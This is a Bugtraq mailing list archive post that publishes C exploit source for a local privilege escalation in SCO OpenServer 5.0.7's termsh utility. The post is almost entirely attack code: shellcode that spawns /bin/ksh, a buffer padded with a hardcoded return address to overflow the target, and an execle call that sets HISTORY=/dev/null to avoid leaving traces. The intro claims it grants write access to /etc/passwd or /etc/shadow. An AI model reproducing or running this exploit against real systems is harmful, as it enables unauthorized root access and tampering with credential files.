Bugtraq mailing list archives
SCO Openserver 5.0.x exploit
From: "rod hedor" <rodhedor () hotmail com>
Date: Mon, 02 Jan 2006 23:43:53 +0000
hi all I RoD hEDoR my web http://www.lezr.com/vb ------------[L - G - H]---------------- SCO Openserver 5.0.x exploit attacker allowing for use this flaw to gain write access to /etc/passwd or /etc/shadow #include <stdio.h> #include <stdlib.h> char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90" "\x68\xff\xf8\xff\x3c\x6a\x65\x89" "\xe6\xf7\x56\x04\xf6\x16\x31\xc0" "\x50\x68""/ksh""\x68""/bin""\x89" "\xe3\x50\x50\x53\xb0\x3b\xff\xd6"; int main(int argc,char* argv[]) { char* buffer; char* arg = "-o"; char *env[] = {"HISTORY=/dev/null",NULL}; long eip,ptr; int i;printf("[ SCO Openserver 5.0.7 termsh local privilege escalation exploit\n");
if(argc < 2) {printf("[ Error : [path]\n[ Example: %s /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh\n",argv[0]);
exit(0); } eip = 0xa2080853; buffer = malloc(7449 + strlen(shellcode)); memset(buffer,'\x00',7449 + strlen(shellcode)); ptr = (long)buffer + strlen(shellcode); strncpy(buffer,shellcode,strlen(shellcode)); for(i = 1;i <= 1862;i++) { memcpy((char*)ptr,(char*)&eip,4); ptr = ptr + 4; } execle(argv[1],argv[1],arg,buffer,NULL,env); exit(0); } _________________________________________________________________Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/
Current thread:
- SCO Openserver 5.0.x exploit rod hedor (Jan 03)